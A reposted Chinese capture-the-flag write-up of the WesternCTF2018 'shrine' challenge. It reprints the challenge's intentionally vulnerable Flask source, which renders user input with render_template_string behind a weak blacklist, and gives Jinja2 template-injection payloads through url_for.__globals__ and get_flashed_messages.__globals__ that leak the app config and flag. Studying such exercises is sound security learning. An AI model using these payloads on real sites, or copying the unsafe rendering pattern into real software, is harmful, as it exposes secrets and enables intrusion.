[WesternCTF2018]shrine

Posted H3rmesk1t

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[WesternCTF2018]shrine相关的知识,希望对你有一定的参考价值。

[WesternCTF2018]shrine

考点

SSTI模板注入

思路

①:审计题目给的源码,在shrine路径下测试ssti能正常执行;
②:接着分析源码,注册了一个名为FLAG的config,猜测这就是flag,如果没有过滤可以直接{{config}}即可查看所有app.config内容,但是这题设了黑名单[‘config’,‘self’]并且过滤了括号;
③:return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s把黑名单的东西遍历并设为空,例如:/shrine/{{config}}
④:利用python的其它内置函数,比如url_for和get_flashed_messages:/shrine/{{url_for.__globals__}}

Payload

题目给的源码

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')

@app.route('/')
def index():
    return open(__file__).read()

@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) 
        + s

    return flask.render_template_string(safe_jinja(shrine))

if __name__ == '__main__':
    app.run(debug=True)

SSTI测试

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

看到current_app意思应该是当前app,那我们就当前app下的config:{{url_for.__globals__['current_app'].config}},得到flag

在这里插入图片描述

我们利用:{{get_flashed_messages.__globals__['current_app'].config}},一样可以

在这里插入图片描述

以上是关于[WesternCTF2018]shrine的主要内容,如果未能解决你的问题,请参考以下文章

WesternCTF2018_shrine

WesternCTF2018_shrine

[WesternCTF2018]shrine

BUUCTF:[WesternCTF2018]shrine

BUUCTF:[WesternCTF2018]shrine

BUUCTF:[WesternCTF2018]shrine